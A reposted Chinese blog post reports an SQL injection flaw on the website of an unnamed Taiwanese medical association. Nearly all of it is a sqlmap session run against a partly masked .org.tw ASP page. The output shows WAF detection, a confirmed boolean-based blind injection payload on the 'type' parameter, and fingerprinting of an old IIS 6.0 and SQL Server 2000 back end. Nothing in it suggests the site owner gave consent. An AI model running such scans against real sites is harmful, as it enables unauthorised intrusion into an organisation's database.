码迷,mamicode.com
首页 > 数据库 > 详细

台湾某医学会sql注入漏洞

时间:2016-06-13 20:40:26      阅读:939      评论:0      收藏:0      [点我收藏+]

标签:

直接上sqlmap神器

PS C:\security tools\sqlmap-master> python.exe .\sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
         _
 ___ ___| |_____ ___ ___  {1.0.5.46#dev}
|_ -| . | |     | .| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all ap
d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:12

[20:17:12] [INFO] testing connection to the target URL
[20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. --timeout=10)
[20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:17:15] [WARNING] WAF/IDS/IPS product hasnt been identified (generic protection response)
[20:17:15] [INFO] testing if the target URL is stable
[20:17:16] [INFO] target URL is stable
[20:17:16] [INFO] testing if GET parameter type is dynamic
[20:17:17] [INFO] confirming that GET parameter type is dynamic
[20:17:17] [INFO] GET parameter type is dynamic
[20:17:17] [INFO] heuristic (basic) test shows that GET parameter type might be injectable (possible DBMS: Microsoft SQL Server)
[20:17:17] [INFO] testing for SQL injection on GET parameter type
it looks like the back-end DBMS is Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for Microsoft SQL Server extending provided level (1) and risk (1) values? [Y/n] 1
[20:17:25] [INFO] testing AND boolean-based blind - WHERE or HAVING clause
[20:17:27] [INFO] GET parameter type seems to be AND boolean-based blind - WHERE or HAVING clause injectable
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase inline queries
[20:17:27] [INFO] testing Microsoft SQL Server/Sybase stacked queries (comment)
[20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option --time-sec as possible (e
[20:17:40] [INFO] testing Microsoft SQL Server/Sybase time-based blind
[20:17:43] [INFO] testing Generic UNION query (NULL) - 1 to 20 columns
[20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:17:45] [INFO] checking if the injection point on GET parameter type is a false positive
[20:17:48] [WARNING] it appears that the character > is filtered by the back-end server. You are strongly advised to rerun with the --tamper=between
GET parameter type is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=6 AND 9449=9449
---
[20:18:04] [INFO] testing Microsoft SQL Server
[20:18:04] [INFO] confirming Microsoft SQL Server
[20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:18:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times

 

台湾某医学会sql注入漏洞

标签:

原文地址:http://www.cnblogs.com/janepeak/p/5581959.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!